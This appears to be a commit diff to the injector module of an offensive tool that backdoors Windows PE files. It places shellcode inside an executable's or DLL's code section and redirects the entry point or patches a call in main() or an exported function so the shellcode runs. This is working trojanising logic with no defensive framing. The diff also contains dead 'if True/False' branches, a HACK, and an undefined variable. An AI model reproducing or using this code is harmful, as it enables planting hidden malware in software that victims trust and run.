refactor: better DLL support

phases/injector.py

@@ -44,25 +44,72 @@ def inject_exe(
     superpe = SuperPe(exe_in)
     pe_backdoorer = PeBackdoor(superpe, main_shc, carrier_invoke_style)
 
-    if superpe.is_dll() and settings.dllfunc == "":
-        raise Exception("DLL injection requires a DLL function name")
-
-    if not pe_backdoorer.injectShellcode(dllfunc=settings.dllfunc):
-        logger.error('Could not inject shellcode into PE file!')
-        return False
-
-    if True: # not superpe.is_dll():
-        if not pe_backdoorer.setupShellcodeEntryPoint():
-            logger.error('Could not setup shellcode launch within PE file!')
-            return False
-    
-    logger.info("--[ Rewrite placeholders with their data")
-    if source_style == FunctionInvokeStyle.iat_reuse:
-        injected_fix_iat(superpe, project.carrier, project.exe_host)
-    
+    # Find a nice location for the shellcode
+    shellcode_offset: int = 0
+    if superpe.is_dll():  # DLL
+        shellcode_offset = 0
+    else:  # EXE
+        pass
     if True:
-        injected_fix_data(superpe, project.carrier, project.exe_host)
+        sect = superpe.get_code_section()
+        if sect == None:
+            raise Exception('Could not find code section in input PE file!')
+        sect_name = sect.Name.decode().rstrip('\x00')
+        sect_size = sect.Misc_VirtualSize  # Better than: SizeOfRawData
 
+        if sect_size < l:
+            raise Exception("Shellcode too large: {} > {}".format(
+                l, sect_size
+            ))
+        shellcode_offset = int((sect_size - l) / 2)
+    shellcode_rva = superpe.pe.get_rva_from_offset(shellcode_offset)
+    logger.info("--( Inject: Shellcode rva:0x{:X}  offset:0x{:X}".format(
+        shellcode_rva, shellcode_offset))
+
+    # Copy the shellcode
+    superpe.pe.set_bytes_at_offset(shellcode_offset, main_shc)
+
+    # HACK
+    pe_backdoorer.shellcodeOffset = shellcode_offset
+    pe_backdoorer.shellcodeOffsetRel = shellcode_offset - sect.PointerToRawData
+    pe_backdoorer.shellcodeAddr = shellcode_rva + superpe.pe.OPTIONAL_HEADER.ImageBase 
+
+    # rewire flow
+    if superpe.is_dll() and settings.dllfunc != "":
+        logger.info("---( Rewire: DLL function: {} ".format(settings.dllfunc))
+
+        if carrier_invoke_style == CarrierInvokeStyle.ChangeEntryPoint:
+            raise Exception("--( Inject DLL: Change Entry Point unsupported when set ".format(
+                settings.dllfunc))
+
+        elif carrier_invoke_style == CarrierInvokeStyle.BackdoorCallInstr:
+            addr = pe_backdoorer.getExportEntryPoint(settings.dllfunc)
+
+            logger.info("--( Inject DLL: Patch {} (0x{:X})".format(
+                settings.dllfunc, addr))
+            pe_backdoorer.backdoor_function(addr, shellcode_rva)
+
+    else: # EXE
+        logger.info("---( Rewire: EXE")
+
+        if carrier_invoke_style == CarrierInvokeStyle.ChangeEntryPoint:
+            logger.info("--( Inject EXE: Change Entry Point to 0x{:X}".format(
+                shellcode_rva))
+            superpe.set_entrypoint(shellcode_rva)
+
+        elif carrier_invoke_style == CarrierInvokeStyle.BackdoorCallInstr:
+            addr = superpe.get_entrypoint()
+            logger.info("--( Inject EXE: Patch main() (0x{:X})".format(
+                addr))
+            pe_backdoorer.backdoor_function(addr, shellcode_rva)
+
+    if False:
+        if source_style == FunctionInvokeStyle.iat_reuse:
+            injected_fix_iat(superpe, project.carrier, project.exe_host)
+        if True:
+            injected_fix_data(superpe, project.carrier, project.exe_host)
+
+    # We done
     superpe.write_pe_to_file(exe_out)
 
     # verify and log
@@ -74,8 +121,6 @@ def inject_exe(
     if config.debug:
         observer.add_code_file("exe_extracted_loader", in_code)
         observer.add_code_file("exe_extracted_jmp", jmp_code)
-    #if in_code != shellcode:
-    #    raise Exception("Shellcode injection error")
 
 
 def injected_fix_iat(superpe: SuperPe, carrier: Carrier, exe_host: ExeHost):